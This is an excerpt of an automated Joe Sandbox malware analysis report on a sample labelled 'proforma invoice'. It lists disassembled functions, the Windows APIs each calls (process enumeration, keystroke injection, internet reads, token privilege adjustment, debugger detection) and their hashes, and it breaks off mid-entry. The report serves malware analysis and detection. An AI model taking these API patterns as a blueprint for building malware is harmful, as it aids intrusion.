                  • Instruction ID: 5e5bcb3476b5e652d875b478a33f857004c48d4df0097972f13f0a8553ae801c
                  • Opcode Fuzzy Hash: da6ab05918eb5edcc9ab89880b525e1dc93b90efbc01f1663b0c7e1e2cdf489d
                  • Instruction Fuzzy Hash: C1A2A070E0065ACBDF24CF59C9807EEB7B1BF55314F2485AAE815AB285EB349D81CF90
                  Function 00B2A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00B2A6AC
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00B2A6BA
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                  • Process32NextW.KERNEL32(00000000,?), ref: 00B2A79C
                  • CloseHandle.KERNEL32(00000000), ref: 00B2A7AB
                    • Part of subcall function 00ABCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00AE3303,?), ref: 00ABCE8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                  • String ID:
                  • API String ID: 1991900642-0
                  • Opcode ID: dab0ddc47f79087fdd5d40da5be9379acfb1a5182c461065ebdd344cff2117b1
                  • Instruction ID: 3a9b4f638c8fada9f0cb94131199d44bebe0cb2693496e186920441aef4e7b25
                  • Opcode Fuzzy Hash: dab0ddc47f79087fdd5d40da5be9379acfb1a5182c461065ebdd344cff2117b1
                  • Instruction Fuzzy Hash: 59514C71508310AFD710EF24D986E6BBBE8FF89754F00895DF59997292EB30D904CB92
                  Function 00B0AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                  Download Yara Rule
                  APIs
                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00B0AAAC
                  • SetKeyboardState.USER32(00000080), ref: 00B0AAC8
                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00B0AB36
                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00B0AB88
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: KeyboardState$InputMessagePostSend
                  • String ID:
                  • API String ID: 432972143-0
                  • Opcode ID: 09ffb8080a511815850543bc3c08538fd7115645043d84c36b2c886d854179cf
                  • Instruction ID: 7e6cc47a851bda0a7eed12a27dee2d2ae4f69bc022c5306c75770af0c5275e0e
                  • Opcode Fuzzy Hash: 09ffb8080a511815850543bc3c08538fd7115645043d84c36b2c886d854179cf
                  • Instruction Fuzzy Hash: 2C311431A40308AEFB359B68CC45BFA7FE6EB44310F144A9AF581A61E1D774C985C762
                  Function 00ADBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00ADBB7F
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • GetTimeZoneInformation.KERNEL32 ref: 00ADBB91
                  • WideCharToMultiByte.KERNEL32(00000000,?,00B7121C,000000FF,?,0000003F,?,?), ref: 00ADBC09
                  • WideCharToMultiByte.KERNEL32(00000000,?,00B71270,000000FF,?,0000003F,?,?,?,00B7121C,000000FF,?,0000003F,?,?), ref: 00ADBC36
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                  • String ID:
                  • API String ID: 806657224-0
                  • Opcode ID: 4795ad65227814affda4c45ccd2c3605436e5ce6ef9b82d496676c9e05d3b52c
                  • Instruction ID: e8ce2e954c8088f670ffe09f7cde72c668d8c3003e97fb278a86afc4b1ce860d
                  • Opcode Fuzzy Hash: 4795ad65227814affda4c45ccd2c3605436e5ce6ef9b82d496676c9e05d3b52c
                  • Instruction Fuzzy Hash: 5D318D71914205DFCB11DF6D8C81969BBB8BF45350B154AABE06AEB3A2DB309940DB70
                  Function 00B1CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                  Download Yara Rule
                  APIs
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00B1CE89
                  • GetLastError.KERNEL32(?,00000000), ref: 00B1CEEA
                  • SetEvent.KERNEL32(?,?,00000000), ref: 00B1CEFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorEventFileInternetLastRead
                  • String ID:
                  • API String ID: 234945975-0
                  • Opcode ID: 653b53e7efa8115d96c000b6772f51d13ea61761cd7b59236b088e5b74358069
                  • Instruction ID: cfff0e00f2ef54ebbfc1b09d1eb39fae21866be3dfd4b0df094cde30bc0d6dd6
                  • Opcode Fuzzy Hash: 653b53e7efa8115d96c000b6772f51d13ea61761cd7b59236b088e5b74358069
                  • Instruction Fuzzy Hash: 8A21C172540305DBD730CFA5C988BABBBFCEB00314F60446EE546E2151EB74ED898B54
                  Function 00B08298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B082AA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: lstrlen
                  • String ID: ($|
                  • API String ID: 1659193697-1631851259
                  • Opcode ID: ece89c24458e9ac861cfe42597a393c1b3d7c7b9b338e3e59577a442d9d1c537
                  • Instruction ID: 105ee55e0de752400932f6f22df6ee6f13aac752844acd5d05f1f56ad03253dc
                  • Opcode Fuzzy Hash: ece89c24458e9ac861cfe42597a393c1b3d7c7b9b338e3e59577a442d9d1c537
                  • Instruction Fuzzy Hash: 08323775A007059FC728CF59C481A6ABBF1FF48710B15C5AEE49ADB3A1EB70EA41CB44
                  Function 00B15C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 00B15CC1
                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B15D17
                  • FindClose.KERNEL32(?), ref: 00B15D5F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Find$File$CloseFirstNext
                  • String ID:
                  • API String ID: 3541575487-0
                  • Opcode ID: a8f7400c48de850dd6c7be2737982b9a929f4007c6264f35cc7580624ec65b30
                  • Instruction ID: 13e6c1796433518b073a9bc834e626e499c7a9e9436bca8fb1b42576154eb187
                  • Opcode Fuzzy Hash: a8f7400c48de850dd6c7be2737982b9a929f4007c6264f35cc7580624ec65b30
                  • Instruction Fuzzy Hash: 37517A74604601DFC724DF28D494E9ABBE4FF4A324F5485ADE95A8B3A1CB30ED84CB91
                  Function 00AD2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 00AD271A
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AD2724
                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00AD2731
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 96a24f996bc7f5468e8ae30a63e771211c22b323391fd67f8ba817c91b44da45
                  • Instruction ID: 4894874997a0fdd0a11726a14ca612397caa6a68e3b83767bf1f5c21255744d4
                  • Opcode Fuzzy Hash: 96a24f996bc7f5468e8ae30a63e771211c22b323391fd67f8ba817c91b44da45
                  • Instruction Fuzzy Hash: CF31D67590121CABCB21DF64DD88BDDBBB8AF18310F5041EAE81CA7260EB349F818F44
                  Function 00B151CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00B151DA
                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B15238
                  • SetErrorMode.KERNEL32(00000000), ref: 00B152A1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorMode$DiskFreeSpace
                  • String ID:
                  • API String ID: 1682464887-0
                  • Opcode ID: 2fe8545d820e712b39501263115ef9524de6010a4867824a9cc0f6c0487571a9
                  • Instruction ID: 8e40239f9f605685a6cf532627f538aaddedec97fba263a988bcf6a65f0b83da
                  • Opcode Fuzzy Hash: 2fe8545d820e712b39501263115ef9524de6010a4867824a9cc0f6c0487571a9
                  • Instruction Fuzzy Hash: 0F315E75A00618DFDB00DF94D884EAEBBF4FF49314F548099E805AB3A2DB31E855CB90
                  Function 00B016C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00ABFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0668
                    • Part of subcall function 00ABFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00AC0685
                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
                  • GetLastError.KERNEL32 ref: 00B0174A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                  • String ID:
                  • API String ID: 577356006-0
                  • Opcode ID: e3935763c335349e2460598810e1c5ad170fb2559431289b4988df722dad6a0a
                  • Instruction ID: 530f086f7edc64d87d0b71c22aef63f31e40f14405a6cd79c5b2f4a12ebc183e
                  • Opcode Fuzzy Hash: e3935763c335349e2460598810e1c5ad170fb2559431289b4988df722dad6a0a
                  • Instruction Fuzzy Hash: 07119EB2504304AFD718AF58DDC6DAABBFDEB44714B24856EE05657281EB70FC418B24
                  Function 00B0D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B0D608
                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00B0D645
                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B0D650
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseControlCreateDeviceFileHandle
                  • String ID:
                  • API String ID: 33631002-0
                  • Opcode ID: b81a306616d80905d28b9de3971580c0745d76dedb1c49eff5e0c034c1823eab
                  • Instruction ID: 2be3cf4d533abf26f3d1ceffd202dd0c8270e3822ea231d0506079c3c56fabb8
                  • Opcode Fuzzy Hash: b81a306616d80905d28b9de3971580c0745d76dedb1c49eff5e0c034c1823eab
                  • Instruction Fuzzy Hash: 64113C75E05228BFDB108F959C45FAFBFBCEB45B50F108155F904F7290D6704A058BA1
                  Function 00B01663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule
                  APIs
                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B0168C
                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B016A1
                  • FreeSid.ADVAPI32(?), ref: 00B016B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: AllocateCheckFreeInitializeMembershipToken
                  • String ID:
                  • API String ID: 3429775523-0
                  • Opcode ID: d6584c164b1cbed5792b9aabc556469955ff9567b3809941f901b7667cd82db1
                  • Instruction ID: 1cf6db109a0d0aea3987522bbaa298f0969b03f98ba20ced62f9295ee7eda7a4
                  • Opcode Fuzzy Hash: d6584c164b1cbed5792b9aabc556469955ff9567b3809941f901b7667cd82db1
                  • Instruction Fuzzy Hash: 6EF0F47195030DFBDB00DFE49D89AAEBBBCEB08704F5049A5E501E2181E774AA448B50
                  Function 00AC4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00AD28E9,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000,?,00AD28E9), ref: 00AC4D09
                  • TerminateProcess.KERNEL32(00000000,?,00AC4CBE,00AD28E9,00B688B8,0000000C,00AC4E15,00AD28E9,00000002,00000000,?,00AD28E9), ref: 00AC4D10
                  • ExitProcess.KERNEL32 ref: 00AC4D22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 1642c343c5e8f1c386ce92e5d0afebaa863319d028bd379b00f53d273f543884
                  • Instruction ID: e9850dca7bf09943b4543370d02be70df7c3c45f1fe902fd89bcf49c075c4bc7
                  • Opcode Fuzzy Hash: 1642c343c5e8f1c386ce92e5d0afebaa863319d028bd379b00f53d273f543884
                  • Instruction Fuzzy Hash: 2AE0B631000548AFCF12BFA4DE1AF993F69EB45791B214418FC06AB222CB35DD52DB88
                  Function 00AFD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • GetUserNameW.ADVAPI32(?,?), ref: 00AFD28C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: NameUser
                  • String ID: X64
                  • API String ID: 2645101109-893830106
                  • Opcode ID: f7e6d15a7ca0b64520f722759b43a7fcdd4027e2f2f76f2de29dabd7675f71c9
                  • Instruction ID: f70148f062015951dd541a957f27c0c569963e3cb3a471bf0a3736578b515e6b
                  • Opcode Fuzzy Hash: f7e6d15a7ca0b64520f722759b43a7fcdd4027e2f2f76f2de29dabd7675f71c9
                  • Instruction Fuzzy Hash: F2D0C9B480111DEACB94DB90DC88DDDB77CBB04305F200151F106A2000DB3096488F10
                  Function 00ACCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                  • Instruction ID: 97fbe2640c45908b6c2dcf7f344587accccfcbd519f866ca847d1e2fba3bab17
                  • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                  • Instruction Fuzzy Hash: 4C020C71E002199BDF14CFA9C980BADBBF1EF48324F25816ED919E7384D731AE418B94
                  Function 00B168EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNEL32(?,?), ref: 00B16918
                  • FindClose.KERNEL32(00000000), ref: 00B16961
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID:
                  • API String ID: 2295610775-0
                  • Opcode ID: 6d68a6c8d03c2ec97a15aeeaa2b0b54ef3b482a80791057d90b6fd75db832077
                  • Instruction ID: f2c2579ec45dfaff0bc35ec3f531afc25947cb3f1970c0b0e302182c418a5723
                  • Opcode Fuzzy Hash: 6d68a6c8d03c2ec97a15aeeaa2b0b54ef3b482a80791057d90b6fd75db832077
                  • Instruction Fuzzy Hash: 841193316042119FD710DF69D884A1ABBE5FF89328F54C699E4698F2A2CB30EC45CB91
                  Function 00B137B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B24891,?,?,00000035,?), ref: 00B137E4
                  • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00B24891,?,?,00000035,?), ref: 00B137F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  • Opcode ID: 1afc5ba809fdc3885cac9b186a7a272b236f43114ebf8954f184c87d7563e351
                  • Instruction ID: d689ae150393fbea821ae4ac040ab034115c86138ecdf7a565bb2a31b84be960
                  • Opcode Fuzzy Hash: 1afc5ba809fdc3885cac9b186a7a272b236f43114ebf8954f184c87d7563e351
                  • Instruction Fuzzy Hash: 04F0A0B16042282AE72027A68D49FEB3AAEEF85B61F000175B509E32C1DA609D4487B1
                  Function 00B0B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B0B25D
                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00B0B270
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
